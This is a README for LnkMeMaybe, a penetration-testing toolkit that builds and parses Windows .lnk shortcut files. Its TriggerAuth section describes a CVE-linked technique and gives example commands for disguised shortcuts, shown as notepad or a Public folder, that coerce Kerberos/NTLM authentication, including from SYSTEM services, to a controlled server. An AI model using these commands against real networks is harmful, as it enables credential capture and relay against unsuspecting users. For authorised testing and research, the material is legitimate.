trustedsec/LnkMeMaybe

# LnkMeMaybe A .NET 8 toolkit for creating and analysing Windows Shell Link (`.lnk`) files. Includes a command-line builder (`LnkMeMaybe`) and a graphical editor (`LnkUi`). Intended for security research and penetration testing. ## Projects | Project | Description | |---------|-------------| | `Lnk/` | Core library. Parses and generates `.lnk` binary format per the [MS-SHLLINK](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/) spec. `LnkHandler` is the main entry point, composing `ShellLinkHeader`, `LinkTargetIDList`, `LinkInfo`, `StringData`, and `ExtraData`. | | `LnkMeMaybe/` | CLI tool. Commands for generating a variety of `.lnk` files. Uses the Titanis.Cli framework. | | `LnkUi/` | Avalonia 11 MVVM desktop editor. Seven ViewModels wrap the corresponding `Lnk` library components. Useful for manual exploration and inspection of `.lnk` files. | | `LnkTests/` | MSTest suite. Real `.lnk` file samples are embedded as resources. Covers `ShellLinkHeader` and `LinkInfo`. | ## CLI — LnkMeMaybe ### Common Parameters All commands share the following base parameters (from `BaseSavedCommand`): | Parameter | Alias | Required | Description | |-----------|-------|----------|-------------| | `--OutputPath` | | Yes | Filesystem path to write the `.lnk` file. | | `--Overwrite` | | No | Allow overwriting an existing file at `OutputPath`. | | `--DisplayName` | | No | Text shown when hovering over the shortcut. Supports `\n` for newlines. | | `--IconPath` / `-I` | `-I` | No | Path to an `.exe` or `.dll` to use as the shortcut icon. Must exist on the **target** system. | | `--IconIndex` | | No | Icon resource index within the file specified by `--IconPath`. Default: `0`. | ### `TriggerAuth` (CVE-2026-25185) Creates a `.lnk` that triggers Kerberos (falling back to NTLM) authentication to a specified server. The `.lnk` does **not** execute anything. **Scenarios where authentication is triggered:** 1. A user browses to the share containing the `.lnk` — the user's account authenticates outbound. 2. The `.lnk` is placed in a location the machine is configured to index — `SearchProtocolHost` authenticates as SYSTEM. 3. MSSense is running and the location is not exempt — `MSSense.exe` authenticates as SYSTEM. **Parameters:** | Parameter | Alias | Required | Description | |-----------|-------|----------|-------------| | `--FakePath` / `-F` | `-F` | Yes | Path displayed as the target in the `.lnk` properties. | | `--Server` / `-S` | `-S` | Yes | Server hostname, IP, or UNC path to send authentication to. Appends `IPC$` if no share is specified. | | `--Darwin` | | No | Darwin identifier stored in the `.lnk`. Can be any value. Default: `unset`. | **Examples:** # Send authentication to \\controlled.example.org\IPC$ while posing as notepad LnkMeMaybe.exe TriggerAuth -F C:\Windows\notepad.exe -S \\controlled.example.org -DisplayName notepad.exe -I C:\Windows\notepad.exe -OutputPath notepad.lnk # Send authentication to a specific share path while posing as a folder shortcut LnkMeMaybe.exe TriggerAuth -F C:\Users\Public -S \\controlled.example.org\validshare\somefile.txt -DisplayName C:\Users\Public -I C:\Windows\system32\imageres.dll -IconIndex 3 -OutputPath Public.lnk ### `WebShortcut` Creates a `.lnk` file that points to a web URL. Normally Windows creates a `.url` file for web shortcuts; this command produces a `.lnk` instead. **Parameters:** | Parameter | Required | Description | |-----------|----------|-------------| | `--Url` | Yes | The URL the shortcut should point to. Must be a well-formed absolute URI. | **Example:** LnkMeMaybe.exe WebShortcut -Url https://example.org -OutputPath example.lnk ### `LocalShortcut` Creates a standard Windows shortcut to a local file or folder. The target path is stored as a shell item ID list (PIDL) — the native format Windows uses for filesystem shortcuts. **Parameters:** | Parameter | Alias | Required | Description | |-----------|-------|----------|-------------| | `--TargetPath` | | Yes | Absolute path to the target file or folder. | | `--Arguments` | | No | Command-line arguments to pass to the target. | | `--WorkingDirectory` | `-W` | No | Working directory for the target process. | | `--RunAsAdmin` | | No | Request UAC elevation when the shortcut is launched. | | `--ShowCommand` | | No | Window state on launch: `Normal`, `Maximized`, or `Minimized`. | **Examples:** # Create a shortcut to Notepad LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --OutputPath notepad.lnk # Shortcut with arguments and a custom icon LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --Arguments myfile.txt --WorkingDirectory C:\Users\Public --OutputPath notepad.lnk -I C:\Windows\notepad.exe # Shortcut that opens maximised and requests elevation LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\System32\cmd.exe --ShowCommand Maximized --RunAsAdmin --OutputPath cmd_admin.lnk ### `EnvShortcut` Creates a `.lnk` where the target path is stored as an expandable environment-variable string (`EnvironmentVariableDataBlock`). This is the format Windows uses for shortcuts to system executables (e.g. `%SystemRoot%\system32\notepad.exe`). Variables are expanded at launch time, making the shortcut portable across Windows installations. **Parameters:** | Parameter | Alias | Required | Description | |-----------|-------|----------|-------------| | `--TargetPath` | | Yes | Target path, may include environment variables such as `%SystemRoot%` or `%USERPROFILE%`. | | `--Arguments` | | No | Command-line arguments to pass to the target. | | `--WorkingDirectory` | `-W` | No | Working directory for the target process. | | `--RunAsAdmin` | | No | Request UAC elevation when the shortcut is launched. | | `--ShowCommand` | | No | Window state on launch: `Normal`, `Maximized`, or `Minimized`. | **Examples:** # Shortcut to Notepad using an environment variable path LnkMeMaybe.exe EnvShortcut --TargetPath "%SystemRoot%\system32\notepad.exe" --OutputPath notepad.lnk # Shortcut to a user-profile app with arguments LnkMeMaybe.exe EnvShortcut --TargetPath "%LOCALAPPDATA%\MyApp\app.exe" --Arguments "--config default" --WorkingDirectory "%USERPROFILE%" --OutputPath myapp.lnk ## Building # Build (debug) dotnet build Lnk.sln # Build (release, core projects only) dotnet build -c Release build.slnf # Run all tests dotnet test # Run a specific test class dotnet test --filter "ClassName=lnkHeader" # Publish self-contained single-file executable (Windows x64) dotnet publish -c Release -r win-x64 -p:PublishSingleFile=true -p:DebugType=None --self-contained true --output LnkMeMaybeWindows LnkMeMaybe/LnkMeMaybe.csproj ## Releases Pre-built binaries for Windows, Linux, and macOS (x64 and arm64) are available on the [Releases](../../releases) page. Each release includes both **standalone** (no .NET runtime required) and **framework-dependent** (requires .NET 8 runtime) builds for `LnkMeMaybe` and `LnkUi`. ## AI Usage Disclosure AI systems were used for the following tasks: - Code quality review - Readme generation - Github workflow actions The code present in this repository was otherwise human created and reviewed.